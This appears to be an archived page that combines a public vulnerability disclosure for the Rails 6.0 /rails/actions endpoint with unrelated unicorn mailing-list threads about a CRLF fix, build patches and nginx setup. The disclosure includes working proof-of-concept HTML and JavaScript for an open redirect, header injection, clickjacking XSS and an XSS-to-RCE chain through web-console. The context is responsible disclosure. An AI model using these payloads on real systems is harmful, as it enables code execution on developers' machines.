https://github.com/rails/rails/blob/v6.0.3.1/actionpack/lib/action_dispatch/middleware/actionable_exceptions.rb#L21

  redirect_to request.params[:location]
end

private
  def actionable_request?(request)
    request.show_exceptions? && request.post? && request.path == endpoint
  end

  def redirect_to(location)
    body = "<html><body>You are being <a
href=\"#{ERB::Util.unwrapped_html_escape(location)}\">redirected</a>.</body></html>"

    [302, {
      "Content-Type" => "text/html; charset=#{Response.default_charset}",
      "Content-Length" => body.bytesize.to_s,
      "Location" => location,
    }, [body]]
  end
There was an open redirect issue because the request parameter
location was not validated.
In 6.0.3.2, since the condition of actionable_request? has changed,
this problem is less likely to occur.

PoC
1. Prepare server
Prepare an attackable 6.0.3.1 version of Rails server

❯ rails -v
Rails 6.0.3.1

❯ RAILS_ENV=production rails s
...
* Environment: production
* Listening on tcp://0.0.0.0:3000
2. Attack server
Prepare the server for attack on another port.

<form method="post"
action="http://localhost:3000/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=https://www.hackerone.com/">
    <button type="submit">click!</button>
</form>
python3 -m http.server 8000
3. Open browser
Open the http://localhost:8000/attack.html url in your browser and
click the button.
Redirect to https://www.hackerone.com/ url.



Impact
It will be fixed with 6.0.3.2 as with
CVE-2020-8185(https://groups.google.com/g/rubyonrails-security/c/pAe9EV8gbM0),
but I think it is necessary to announce it again because the range of
influence is different.

This open redirect changes from POST method to Get Method, so it may
be difficult to use for phishing.On the other hand, it may affect
bypass of referrer check or SSRF.



ooooooo_q------

I thought about it after submitting the report, but even in 6.0.3.2,
/rails/actions is available in developer mode.
If it was started in development mode, the request will be accepted by
CSRF, so the same as CVE-2020-8185 still exists.
I think it's better to take CSRF measures in /rails/actions.

Vulnerabilities, versions and modes
6.0.3.1 (production, development)
run pending migrations (CVE-2020-8185)
open redirect
6.0.3.2 (development)
run pending migrations (by CSRF)
open redirect (by CSRF)
6.0.3.2 (production)
no problem


tenderloveRuby on Rails staff -------

This seems like a good improvement, but I don't think we need to treat
it as a security issue. If you agree, would you mind filing an issue
on the Rails GitHub issues?
Thank you!


ooooooo_q------

@tenderlove
I'm sorry to reply late.

While researching unicorn, I found this report to lead to other vulnerabilities.

Open Redirect to HTTP header injection
Response header injection vulnerability exists in versions of puma below 4.3.2.
https://github.com/puma/puma/security/advisories/GHSA-84j7-475p-hp8v
I have confirmed that unicorn is also enable of response header injection.

HTTP header injection is possible by including \r in the redirect URL
using these.

PoC
> escape("\rSet-cookie:a=a")
"%0DSet-cookie%3Aa%3Da"
This is the html used on the attack server.

<form method="post"
action="http://localhost:3000/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0DSet-cookie%3Aa%3Da">
  <button type="submit">set cookie</button>
</form>
When click this button, the response header will be as follows.

Location:
Set-cookie: a=a
If you open the developer tools in your browser, you'll see that the
cookie value is set.

When I tried it, puma and unicorn can insert only the character of \r,
and it seems that \n cannot be inserted.
Therefore, it seems that response body injection that leads to XSS
cannot be performed.

On the other hand, in passenger, it became an error when \r was in the
value of the header.

XSS trick
While trying out \r on the response header, I noticed a strange thing.
If \r is at the beginning, it means that the browser is not redirected
and javascript: can be used in the URL of the response link.
When specify \rjavascript:alert(location) as the redirect destination,
the HTML of the response will be as follows.

<html><body>You are being <a href="
javascript:alert(location)">redirected</a>.</body></html>
The \r character is ignored in html, so javascript:alert(location) is
executed when the user clicks the link.

This is a separate issue from HTTP header injection and depends on how
the server handles the value of \r.
In puma and unicorn below 4.3.2, \r is used for HTTP header injection,
so no error occurs.
With puma 4.3.3 or later, if there is a line containing \r, it does
not become an error and it can be executed because that line is
excluded.
On the other hand, the error occurred in passenger.

As a further issue, the headers in this response are
middleware-specific and therefore do not include the security headers
Rails is outputting.
Since X-Frame-Options is not included, click jacking is possible.
No output even if CSP is set in the application.

By using click jacking in combination with these, it is easy to
generate XSS that requires user click.

PoC
Inserting the execution code from another site using the name of the iframe.

This PoC will also run in production mode if 6.0.0 < rails < 6.0.3.2.
It can be run with the latest puma and unicorn.

If it is development mode, it can be executed even after 6.0.3.2

child.html
<form method="post"
action="http://localhost:3000/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aeval%28name%29">
    <button type="submit">location is escape("\rjavascript:eval(name)")</button>
</form>
<script type="text/javascript">
    document.querySelector("button").click();
</script>
click_jacking.html
<html>
<style>
iframe{
    position: absolute;
    z-index: 1;
    opacity: 0.3;
}
div{
    position: absolute;
    top: 20px;
    left: 130px;
}
button {
    width: 80px;
    height: 26px;
    cursor: pointer;
}
</style>
<body>
    <iframe src=./child.html name="alert(location)" height=40></iframe>
    <div>
        <button>click!!</button>
    </div>
</body>
</html>



XSS to RCE
When XSS exists in development mode, I confirmed that calling the
method of web-cosole leads to RCE.
RCE is possible by inducing users who are developing Rails
applications to click on the trap site.

PoC
var iframe = document.createElement("iframe");
iframe.src = "/not_found";
document.body.appendChild(iframe);
setTimeout(()=>fetch("/__web_console/repl_sessions/" +
iframe.contentDocument.querySelector("#console").dataset.sessionId, {
    method: "PUT",
    headers: {
        "Content-Type": "application/json",
        "X-Requested-With": "XMLHttpRequest"
    },
    body: JSON.stringify({
        input: "`touch from_web_console`"
    })
}), 2000)
<iframe src=./child.html name='var iframe =
document.createElement("iframe");iframe.src =
"/not_found";document.body.appendChild(iframe);setTimeout(()=>
fetch("/__web_console/repl_sessions/"+iframe.contentDocument.querySelector("#console").dataset.sessionId,
{method: "PUT",headers: {"Content-Type":
"application/json","X-Requested-With": "XMLHttpRequest"},body:
JSON.stringify({input: "`touch from_web_console`"})}),2000)'/>
When this is run, a file from from_web_console will be generated.

Vulnerabilities and conditions
Run pending migrations (CVE-2020-8185)
server: any

Rails version: 6.0.0 < rails < 6.0.3.2
RAILS_ENV: production

Run pending migrations by CSRF
server: any

Rails version: 6.0.0 < (not fixed)
RAILS_ENV: development

Open redirect (from POST method)
server: any

Rails version: 6.0.0 < rails < 6.0.3.2
RAILS_ENV: production

or

Rails version: 6.0.0 < (not fixed)
RAILS_ENV: development

HTTP header injection
server: unicorn (<= latest) or puma (< 4.3.2)

Rails version: 6.0.0 < rails < 6.0.3.2
RAILS_ENV: production

or

Rails version: 6.0.0 < (not fixed)
RAILS_ENV: development

XSS (need user click)
server: unicorn (<= latest) or puma (<= latest)

Railse version: 6.0.0 < rails < 6.0.3.2
RAILS_ENV: production

or

Railse version: 6.0.0 < (not fixed)
RAILS_ENV: development

RCE (from XSS)
server: unicorn (<= latest) or puma (<= latest)
Railse version: 6.0.0 < (not fixed)
RAILS_ENV: development



ooooooo_q------

When I tried it, puma and unicorn can insert only the character of \r,
and it seems that \n cannot be inserted.
Makes sense. This seems like a security vulnerability in Puma / Unicorn.
This is a separate issue from HTTP header injection and depends on how
the server handles the value of \r.
I'm not sure exactly which servers are vulnerable (this is too
confusing for me 😔), but whatever handles generating the response
page shouldn't allow \r at the beginning of the href like that.
So this needs to check that location is a url (http or https).
I don't think we need to set the security policy for the redirect page
if we prevent the javascript: location from the href.
How does this patch look?

On Wed, Jan 6, 2021 at 5:53 PM Eric Wong <bofh@yhbt.net> wrote:
>
> Sam Sanoop <sams@snyk.io> wrote:
> > Hi Eric,
>
> cf. https://yhbt.net/unicorn-public/20201126115902.GA8883@dcvr/
> (private followup <CAEQPCYJJdriMQyDNXimCS_kBrc_=DxhxJ66YdJmCe7ZXr-Zbvg@mail.gmail.com>)
>
> Hi Sam, I'm moving this to the public list.  Please keep
> unicorn-public@yhbt.net Cc-ed (no need to quote, archives are
> public and mirrored to several places).
>
> > I wanted to bring this up again. I spoke with the researcher
> > (@ooooooo_q) who disclosed this issue to us. He released the full
> > details including the HackerOne report pubclily which provided more
> > clarity about this issue. That can be read here:
> > https://hackerone.com/reports/904059#activity-8945588
>
> Note: I can't read anything on hackerone due to the JavaScript
> requirement.  If somebody can copy the text here, that'd be
> great.
>
> > That report was initially disclosed to the Ruby on Rails maintainers.
> > In certain conditions, he was also able to leverage Puma and Unicorn
> > to exploit the issues mentioned on the report. The issues which
> > related to Unicorn were:
> >
> > * Open Redirect to HTTP header injection - (including \r in the redirect URL)
> > * A user interaction XSS  - Which leverages
> > \rjavascript:alert(location) as the redirect destination
>
> Does this happen when unicorn is behind nginx?
>
> unicorn was always designed to run behind nginx and falls over badly
> without it (trivially DoS-ed via slowloris)
>
> > Reading that advisory, I see this more of an issue now. He has
> > leveraged Unicorn and Puma along with Rails to demonstrate some of the
> > proof of concepts. Under the section Vulnerabilities and conditions of
> > the report, he has specified different conditions and configurations
> > which allow for this vector.
> >
> > I agree with Aaron Patterson's (Rails Staff) decision on that report,
> > this should be fixed in Unicorn and Puma directly, and Puma has
> > already fixed this and issued an advisory:
> > https://github.com/puma/puma/security/advisories/GHSA-84j7-475p-hp8v.
> >
> > I believe there is enough of a risk to fix this issue. What do you think?
>
> While we follow puma on some things (as in recent non-rack
> features), I'm not sure if this affects unicorn the same way it
> affects puma and other servers (that are supported without nginx).
>
> Fwiw, I've been against client-side JavaScript for a decade, now.
> Libre license or not; the complexity of JS gives us a never-ending
> stream of vulnerabilities, wasted RAM, CPU cycles, and bandwidth
> use from constant software updates needed to continue the game of
> whack-a-mole.
>
> rest of thread below (top-posting corrected):
>
> > > On Sun, Jan 3, 2021 at 10:20 PM Eric Wong <bofh@yhbt.net> wrote:
> > > >
> > > > Sam Sanoop <sams@snyk.io> wrote:
> > > > > Hey Eric,
> > > > >
> > > > > Happy New Year. I want to follow up on the [RFC] http_response: ignore
> > > > > invalid header response character RFC for the CRLF injection we spoke
> > > > > about previously. I wanted to know what would be the timeline for your
> > > > > patch to get merged and what additional steps there are before that
> > > > > can happen.
> > > >
> > > > Hi Sam, honestly I have no idea if it's even necessary...
> > > > I've had no feedback since 2020-11-26:
> > > >   https://yhbt.net/unicorn-public/20201126115902.GA8883@dcvr/
> > > >
> > > > Meanwhile 5.8.0 was released 2020-12-24 with a feature somebody
> > > > actually cared about.
> > > >
> > > > Again, unicorn falls over without nginx in front of it anyways,
> > > > so maybe nginx already guards against this and extra code is
> > > > unnecessary on my end.
> >
> > On Sun, Jan 3, 2021 at 11:03 PM Sam Sanoop <sams@snyk.io> wrote:
> > >
> > > Hey Eric,
> > >
> > > No problem, I understand. Since the injection here is happening within
> > > the response, I am not convinced if this is exploitable as well. I
> > > have let the reporter of this issue know what your stance is. I
> > > mentioned if he can provide a better Proof of Concept where this is
> > > exploitable in the context of a http request, and look into this a bit
> > > further, we can open up discussion again, or else, this is not worth
> > > fixing.



-- 

Sam Sanoop
Security Analyst

^ permalink raw reply	[relevance 1%]

* Re: [RFC] http_response: ignore invalid header response characters
  @ 2021-01-06 17:53  2% ` Eric Wong
  2021-01-13 23:20  1%   ` Sam Sanoop
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2021-01-06 17:53 UTC (permalink / raw)
  To: Sam Sanoop; +Cc: unicorn-public

Sam Sanoop <sams@snyk.io> wrote:
> Hi Eric,

cf. https://yhbt.net/unicorn-public/20201126115902.GA8883@dcvr/
(private followup <CAEQPCYJJdriMQyDNXimCS_kBrc_=DxhxJ66YdJmCe7ZXr-Zbvg@mail.gmail.com>)

Hi Sam, I'm moving this to the public list.  Please keep
unicorn-public@yhbt.net Cc-ed (no need to quote, archives are
public and mirrored to several places).

> I wanted to bring this up again. I spoke with the researcher
> (@ooooooo_q) who disclosed this issue to us. He released the full
> details including the HackerOne report pubclily which provided more
> clarity about this issue. That can be read here:
> https://hackerone.com/reports/904059#activity-8945588

Note: I can't read anything on hackerone due to the JavaScript
requirement.  If somebody can copy the text here, that'd be
great.

> That report was initially disclosed to the Ruby on Rails maintainers.
> In certain conditions, he was also able to leverage Puma and Unicorn
> to exploit the issues mentioned on the report. The issues which
> related to Unicorn were:
> 
> * Open Redirect to HTTP header injection - (including \r in the redirect URL)
> * A user interaction XSS  - Which leverages
> \rjavascript:alert(location) as the redirect destination

Does this happen when unicorn is behind nginx?

unicorn was always designed to run behind nginx and falls over badly
without it (trivially DoS-ed via slowloris)

> Reading that advisory, I see this more of an issue now. He has
> leveraged Unicorn and Puma along with Rails to demonstrate some of the
> proof of concepts. Under the section Vulnerabilities and conditions of
> the report, he has specified different conditions and configurations
> which allow for this vector.
> 
> I agree with Aaron Patterson's (Rails Staff) decision on that report,
> this should be fixed in Unicorn and Puma directly, and Puma has
> already fixed this and issued an advisory:
> https://github.com/puma/puma/security/advisories/GHSA-84j7-475p-hp8v.
> 
> I believe there is enough of a risk to fix this issue. What do you think?

While we follow puma on some things (as in recent non-rack
features), I'm not sure if this affects unicorn the same way it
affects puma and other servers (that are supported without nginx).

Fwiw, I've been against client-side JavaScript for a decade, now.
Libre license or not; the complexity of JS gives us a never-ending
stream of vulnerabilities, wasted RAM, CPU cycles, and bandwidth
use from constant software updates needed to continue the game of
whack-a-mole.

rest of thread below (top-posting corrected):

> > On Sun, Jan 3, 2021 at 10:20 PM Eric Wong <bofh@yhbt.net> wrote:
> > >
> > > Sam Sanoop <sams@snyk.io> wrote:
> > > > Hey Eric,
> > > >
> > > > Happy New Year. I want to follow up on the [RFC] http_response: ignore
> > > > invalid header response character RFC for the CRLF injection we spoke
> > > > about previously. I wanted to know what would be the timeline for your
> > > > patch to get merged and what additional steps there are before that
> > > > can happen.
> > >
> > > Hi Sam, honestly I have no idea if it's even necessary...
> > > I've had no feedback since 2020-11-26:
> > >   https://yhbt.net/unicorn-public/20201126115902.GA8883@dcvr/
> > >
> > > Meanwhile 5.8.0 was released 2020-12-24 with a feature somebody
> > > actually cared about.
> > >
> > > Again, unicorn falls over without nginx in front of it anyways,
> > > so maybe nginx already guards against this and extra code is
> > > unnecessary on my end.
>
> On Sun, Jan 3, 2021 at 11:03 PM Sam Sanoop <sams@snyk.io> wrote:
> >
> > Hey Eric,
> >
> > No problem, I understand. Since the injection here is happening within
> > the response, I am not convinced if this is exploitable as well. I
> > have let the reporter of this issue know what your stance is. I
> > mentioned if he can provide a better Proof of Concept where this is
> > exploitable in the context of a http request, and look into this a bit
> > further, we can open up discussion again, or else, this is not worth
> > fixing.

^ permalink raw reply	[relevance 2%]

* [PATCH] build: publish_doc: remove created.rid and index.html from site
@ 2020-12-24 20:40  7% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2020-12-24 20:40 UTC (permalink / raw)
  To: unicorn-public

created.rid has no business being published anyways, and
index.html is redundant given README.html.  Avoid confusing
search engines with identical documents at different URLs.

Our "homepage" is just a directory listing, now, which should
help discoverability of non-HTML docs.  Old content is at
https://yhbt.net/unicorn/README.html
---
 GNUmakefile | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/GNUmakefile b/GNUmakefile
index d80e6080..dd0a761a 100644
--- a/GNUmakefile
+++ b/GNUmakefile
@@ -245,7 +245,8 @@ publish_doc:
 	$(MAKE) doc
 	$(MAKE) doc_gz
 	chmod 644 $$(find doc -type f)
-	$(RSYNC) -av doc/ yhbt.net:/srv/yhbt/unicorn/
+	$(RSYNC) -av doc/ yhbt.net:/srv/yhbt/unicorn/ \
+		--exclude index.html* --exclude created.rid*
 	git ls-files | xargs touch
 
 # Create gzip variants of the same timestamp as the original so nginx

^ permalink raw reply related	[relevance 7%]

* Re: [PATCH] Update ruby_version requirement to allow ruby 3.0
  @ 2020-09-08  8:50  3%                           ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2020-09-08  8:50 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@shopify.com> wrote:
> > Ah, perhaps adding some checks to extconf.rb would be useful?
> > Or moving the ragel invocation into the extconf.rb-generated
> > Makefile? (not too sure how to do that...).
> 
> Not really no. And it would make ragel a build dependency.

No, the generated .c file would still be distributed with the
gem as it is today.  I'm absolutely against introducing new
build requirements (optional dependencies, maybe, but not
requirements).

Changing the .rl file might result in ragel running (or emit
warning if ragel isn't installed).  Not too sure how to do that
via mkmf, though...  Or it would just throw a warning and drop a
hint to run "make ragel" at the top-level if the .c file is
missing...

> But really I don't think so many people need to use unicorn
> branches.

*shrug*  I figure for any one person that posts a comment for
something on any public forum, there's probably 10 that feel the
same way.

> > OK, soon.  Maybe with just the aforementioned ragel check above;
> > or not even...  
> 
> I'd say not even. It's just for people like me trying to run branches.

Alright, we can experiment with more build system changes
another time another (and I zoned out while writing the 5.7
release notes and forgot to note the minor build system changes
I made right after th 5.6.0 release :x)

https://yhbt.net/unicorn-public/20200908084429.GA16521@dcvr/

^ permalink raw reply	[relevance 3%]

* Re: [PATCH] Update ruby_version requirement to allow ruby 3.0
  @ 2020-09-03 11:23  3%               ` Jean Boussier
    0 siblings, 1 reply; 200+ results
From: Jean Boussier @ 2020-09-03 11:23 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

> Do the current dependencies (kgio, raindrops) export alright, as well?

Yes just fine.

> Might be worth comparing the generated Makefile with other gems
> and see if there's missing flags or such.

I tried that but couldn't figure anything.

> Also, did things work a few days/weeks ago when ruby.git was still 2.8?

They worked fine yes. But I doubt it's caused by the version number,
the must have removed some deprecated stuff at the same time.

> *shrug* my brain hurts from other stuff

No worries. It was just in case it would ring a bell for you.
I'll keep looking and ask for help from colleagues.

^ permalink raw reply	[relevance 3%]

* Re: Connection issues between nginx and unicorn
  @ 2020-08-18 18:06  2% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2020-08-18 18:06 UTC (permalink / raw)
  To: Michael Bernstein; +Cc: unicorn-public, Daniel Libanori, Luiz Ferreira

Michael Bernstein <michael.bernstein@clicksign.com> wrote:
> Hello,
> 
> We are having a lot of connection issues between nginx and unicorn,
> but we don't know exactly where is the issue. Can somebody help us?

Sure, replies in line...

> Exemple from our nginx logs:
> [error] 6#6: *4269348 connect() failed (111: Connection refused) while
> connecting to upstream, client: 10.2.2.252, server: _, request: "POST
> /api/v1/documents?access_token=....
> [error] 6#6: *4269169 recv() failed (104: Connection reset by peer)
> while reading response header from upstream, client: 10.2.10.120,
> server: _, request: "GET /api/v1/documents/.....
> [error] 6#6: *4268896 upstream timed out (110: Operation timed out)
> while connecting to upstream, client: 10.2.2.252, server: _, request:
> "GET /accounts/.... HTTP/1.1", upstream:
> "http://172.20.214.176:80/accounts...", host: "app.clicksign.com",
> referrer: "https://app.clicksign.com/..."

Did any connections ever work?

> ############
> Unicorn configuration file:
> 
> # frozen_string_literal: true
> 
> listen 8080

OK, so that means it's listening to all IP addresses on TCP port 8080;
no problem here.

If you use curl to hit 8080 on the host(s) unicorn is running,
it should work.

> worker_processes 4
> timeout 60
> 
> preload_app true
> GC.respond_to?(:copy_on_write_friendly=) &&
>   (GC.copy_on_write_friendly = true)

Off-topic, GC.copy_on_write_friendly is the default in Ruby 2.0+;
(and IIRC it wasn't in any official Ruby release, just the
Phusion "Enterprise Edition")

<snip>

> ############
> nginx configuration file:
> 
> proxy_cache_path /var/cache/nginx/ levels=1:2 keys_zone=assets_cache:10m
>                  max_size=1g inactive=60m use_temp_path=off;
> 
> resolver kube-dns.kube-system.svc.cluster.local valid=5s;
> 
> upstream backend {
>   server unicorn;

Is "unicorn" an entry in your DNS (via search path) or
an entry in /etc/hosts file?

There's also no reference to port 8080 anywhere in your nginx
config, so I don't know how nginx is supposed to know that
unicorn is on port 8080.

I would expect to see something like:

    server unicorn.internal.example.com:8080;

Or if on the same host:

    server 127.0.0.1:8080;

> }
> 
> server {
>   server_name _;

<snip>

>   location ~* ^/(fonts|webfonts|assets|packs) {
>     proxy_redirect off;
>     proxy_cache assets_cache;
>     proxy_cache_valid 120m;
>     proxy_pass http://backend;
>     add_header Cache-Control public;
>     if ($http_origin ~
> '^((https*?:\/\/).*?((\.clicksign)\.(com|me|dev)))($|\/.*$)$' ){
>       add_header Access-Control-Allow-Origin $http_origin;
>     }
>     expires max;
>   }
> 
>   location / {
>     proxy_pass http://backend;
>     proxy_redirect off;
>     proxy_read_timeout 60;
>     proxy_set_header Host $http_host;
>   }

No references to port 8080 in either location block, either.

I don't think you need 8080 in location block if you have them
in the "upstream backend" block; it's been a while since I've
used nginx... But you need 8080 (and the correct IP address or
DNS entry) somewhere.

^ permalink raw reply	[relevance 2%]

* Re: Can Unicorn utilize HTTPS?
  @ 2020-08-06 21:54  4% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2020-08-06 21:54 UTC (permalink / raw)
  To: Keven Sticher; +Cc: unicorn-public

Keven Sticher <ksticher@gmail.com> wrote:
> Going through some internal debate, and if end to end encryption is required through all layers, does Unicorn handle TLS, SSL, HTTPS?

Nope.  It's only intended to talk to nginx over a Unix domain
socket on the same host, or nginx on a fast private LAN.  Having
something like varnish or haproxy in between nginx and unicorn
is fine, too, but they must either be on the same host or fast
LAN.

It fails horribly (by design :>) when talking to the open Internet
or any high-latency clients.

> Thank you for your response.

no problem :>

^ permalink raw reply	[relevance 4%]

* [PATCH] doc: s/bogomips.org/yhbt.net/g
  @ 2020-01-14  7:46  1% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2020-01-14  7:46 UTC (permalink / raw)
  To: unicorn-public

bogomips.org is due to expire, soon, and I'm not willing to pay
extortionist fees to Ethos Capital/PIR/ICANN to keep a .org.  So
it's at yhbt.net, for now, but it will change again to
whatever's affordable...  Identity is overrated.

Tor users can use .onions and kick ICANN to the curb:

	torsocks w3m http://unicorn.ou63pmih66umazou.onion/
	torsocks git clone http://ou63pmih66umazou.onion/unicorn.git/
	torsocks w3m http://ou63pmih66umazou.onion/unicorn-public/

While we're at it, `s/news.gmane.org/news.gmane.io/g', too.
(but I suspect that'll need to be resynched since our mail
"List-Id:" header is changing).
---
 .olddoc.yml                      | 19 ++++++++++++-------
 Documentation/unicorn.1          |  8 ++++----
 Documentation/unicorn_rails.1    |  8 ++++----
 FAQ                              |  2 +-
 GNUmakefile                      |  4 ++--
 HACKING                          |  2 +-
 ISSUES                           | 24 ++++++++++++------------
 KNOWN_ISSUES                     |  4 ++--
 Links                            | 10 +++++-----
 README                           | 12 ++++++------
 SIGNALS                          |  2 +-
 Sandbox                          |  4 ++--
 archive/slrnpull.conf            |  2 +-
 examples/big_app_gc.rb           |  2 +-
 examples/logrotate.conf          |  4 ++--
 examples/nginx.conf              |  2 +-
 examples/unicorn.conf.minimal.rb |  4 ++--
 examples/unicorn.conf.rb         |  4 ++--
 ext/unicorn_http/unicorn_http.rl |  2 +-
 lib/unicorn.rb                   |  2 +-
 lib/unicorn/configurator.rb      |  6 +++---
 lib/unicorn/http_server.rb       |  2 +-
 lib/unicorn/oob_gc.rb            |  4 ++--
 unicorn.gemspec                  |  4 ++--
 24 files changed, 71 insertions(+), 66 deletions(-)

diff --git a/.olddoc.yml b/.olddoc.yml
index d2d340f..0609bdb 100644
--- a/.olddoc.yml
+++ b/.olddoc.yml
@@ -1,8 +1,9 @@
 ---
-cgit_url: https://bogomips.org/unicorn.git
-git_url: https://bogomips.org/unicorn.git
-rdoc_url: https://bogomips.org/unicorn/
-ml_url: https://bogomips.org/unicorn-public/
+cgit_url: https://yhbt.net/unicorn.git
+rdoc_url: https://yhbt.net/unicorn/
+ml_url:
+- https://yhbt.net/unicorn-public/
+- http://ou63pmih66umazou.onion/unicorn-public/
 merge_html:
   unicorn_1: Documentation/unicorn.1.html
   unicorn_rails_1: Documentation/unicorn_rails.1.html
@@ -11,7 +12,11 @@ noindex:
 - LATEST
 - TODO
 - unicorn_rails_1
-public_email: unicorn-public@bogomips.org
+public_email: unicorn-public@yhbt.net
 nntp_url:
-  - nntp://news.public-inbox.org/inbox.comp.lang.ruby.unicorn
-  - nntp://news.gmane.org/gmane.comp.lang.ruby.unicorn.general
+- nntp://news.public-inbox.org/inbox.comp.lang.ruby.unicorn
+- nntp://ou63pmih66umazou.onion/inbox.comp.lang.ruby.unicorn
+- nntp://news.gmane.io/gmane.comp.lang.ruby.unicorn.general
+source_code:
+- git clone https://yhbt.net/unicorn.git
+- torsocks git clone http://ou63pmih66umazou.onion/unicorn.git
diff --git a/Documentation/unicorn.1 b/Documentation/unicorn.1
index 3f8cb96..d76d40f 100644
--- a/Documentation/unicorn.1
+++ b/Documentation/unicorn.1
@@ -154,7 +154,7 @@ TTIN \- increment the number of worker processes by one
 .IP \[bu] 2
 TTOU \- decrement the number of worker processes by one
 .PP
-See the SIGNALS (https://bogomips.org/unicorn/SIGNALS.html) document for
+See the SIGNALS (https://yhbt.net/unicorn/SIGNALS.html) document for
 full description of all signals used by Unicorn.
 .SH RACK ENVIRONMENT
 .PP
@@ -204,11 +204,11 @@ the unicorn config file.
 \f[I]Rack::Builder\f[] ri/RDoc
 .IP \[bu] 2
 \f[I]Unicorn::Configurator\f[] ri/RDoc
-.UR https://bogomips.org/unicorn/Unicorn/Configurator.html
+.UR https://yhbt.net/unicorn/Unicorn/Configurator.html
 .UE
 .IP \[bu] 2
 unicorn RDoc
-.UR https://bogomips.org/unicorn/
+.UR https://yhbt.net/unicorn/
 .UE
 .IP \[bu] 2
 Rack RDoc
@@ -219,4 +219,4 @@ Rackup HowTo
 .UR https://github.com/rack/rack/wiki/(tutorial)-rackup-howto
 .UE
 .SH AUTHORS
-The Unicorn Community <unicorn-public@bogomips.org>.
+The Unicorn Community <unicorn-public@yhbt.net>.
diff --git a/Documentation/unicorn_rails.1 b/Documentation/unicorn_rails.1
index 71c80be..fec0a2a 100644
--- a/Documentation/unicorn_rails.1
+++ b/Documentation/unicorn_rails.1
@@ -180,7 +180,7 @@ TTIN \- increment the number of worker processes by one
 .IP \[bu] 2
 TTOU \- decrement the number of worker processes by one
 .PP
-See the SIGNALS (https://bogomips.org/unicorn/SIGNALS.html) document for
+See the SIGNALS (https://yhbt.net/unicorn/SIGNALS.html) document for
 full description of all signals used by Unicorn.
 .SH SEE ALSO
 .IP \[bu] 2
@@ -189,11 +189,11 @@ unicorn(1)
 \f[I]Rack::Builder\f[] ri/RDoc
 .IP \[bu] 2
 \f[I]Unicorn::Configurator\f[] ri/RDoc
-.UR https://bogomips.org/unicorn/Unicorn/Configurator.html
+.UR https://yhbt.net/unicorn/Unicorn/Configurator.html
 .UE
 .IP \[bu] 2
 unicorn RDoc
-.UR https://bogomips.org/unicorn/
+.UR https://yhbt.net/unicorn/
 .UE
 .IP \[bu] 2
 Rack RDoc
@@ -204,4 +204,4 @@ Rackup HowTo
 .UR https://github.com/rack/rack/wiki/(tutorial)-rackup-howto
 .UE
 .SH AUTHORS
-The Unicorn Community <unicorn-public@bogomips.org>.
+The Unicorn Community <unicorn-public@yhbt.net>.
diff --git a/FAQ b/FAQ
index 4ae2034..018ca92 100644
--- a/FAQ
+++ b/FAQ
@@ -7,7 +7,7 @@ drained entirely by the application.  This may happen when request
 bodies are gzipped, as unicorn reads request body data lazily to avoid
 overhead from bad requests.
 
-Ref: https://bogomips.org/unicorn-public/FC91211E-FD32-432C-92FC-0318714C2170@zendesk.com/
+Ref: https://yhbt.net/unicorn-public/FC91211E-FD32-432C-92FC-0318714C2170@zendesk.com/
 
 === Why aren't my Rails log files rotated when I use SIGUSR1?
 
diff --git a/GNUmakefile b/GNUmakefile
index 94c46ee..eac3473 100644
--- a/GNUmakefile
+++ b/GNUmakefile
@@ -193,13 +193,13 @@ doc: .document $(ext)/unicorn_http.c man html .olddoc.yml $(PLACEHOLDERS)
 	install -m644 $(man1_paths) doc/
 	tar cf - $$(git ls-files examples/) | (cd doc && tar xf -)
 
-# publishes docs to https://bogomips.org/unicorn/
+# publishes docs to https://yhbt.net/unicorn/
 publish_doc:
 	-git set-file-times
 	$(MAKE) doc
 	$(MAKE) doc_gz
 	chmod 644 $$(find doc -type f)
-	$(RSYNC) -av doc/ bogomips.org:/srv/bogomips/unicorn/
+	$(RSYNC) -av doc/ yhbt.net:/srv/yhbt/unicorn/
 	git ls-files | xargs touch
 
 # Create gzip variants of the same timestamp as the original so nginx
diff --git a/HACKING b/HACKING
index be1bb85..976bf92 100644
--- a/HACKING
+++ b/HACKING
@@ -57,7 +57,7 @@ Please wrap documentation at 72 characters-per-line or less (long URLs
 are exempt) so it is comfortably readable from terminals.
 
 When referencing mailing list posts, use
-<tt>https://bogomips.org/unicorn-public/$MESSAGE_ID/</tt> if possible
+<tt>https://yhbt.net/unicorn-public/$MESSAGE_ID/</tt> if possible
 since the Message-ID remains searchable even if a particular site
 becomes unavailable.
 
diff --git a/ISSUES b/ISSUES
index 473da2f..d11dc56 100644
--- a/ISSUES
+++ b/ISSUES
@@ -1,9 +1,9 @@
 = Issues
 
-mailto:unicorn-public@bogomips.org is the best place to report bugs,
+mailto:unicorn-public@yhbt.net is the best place to report bugs,
 submit patches and/or obtain support after you have searched the
-{email archives}[https://bogomips.org/unicorn-public/] and
-{documentation}[https://bogomips.org/unicorn/].
+{email archives}[https://yhbt.net/unicorn-public/] and
+{documentation}[https://yhbt.net/unicorn/].
 
 * No subscription will ever be required to email us
 * Cc: all participants in a thread or commit, as subscription is optional
@@ -12,12 +12,12 @@ submit patches and/or obtain support after you have searched the
 * Do not send HTML mail or images,
   they hurt reader privacy and will be flagged as spam
 * Anonymous and pseudonymous messages will ALWAYS be welcome
-* The email submission port (587) is enabled on the bogomips.org MX:
-  https://bogomips.org/unicorn-public/20141004232241.GA23908@dcvr.yhbt.net/t/
+* The email submission port (587) is enabled on the yhbt.net MX:
+  https://yhbt.net/unicorn-public/20141004232241.GA23908@dcvr.yhbt.net/t/
 
 We will never have a centralized or formal bug tracker.  Instead we
 can interoperate with any bug tracker which can Cc: us plain-text to
-mailto:unicorn-public@bogomips.org   This includes the Debian BTS
+mailto:unicorn-public@yhbt.net   This includes the Debian BTS
 at https://bugs.debian.org/unicorn and possibly others.
 
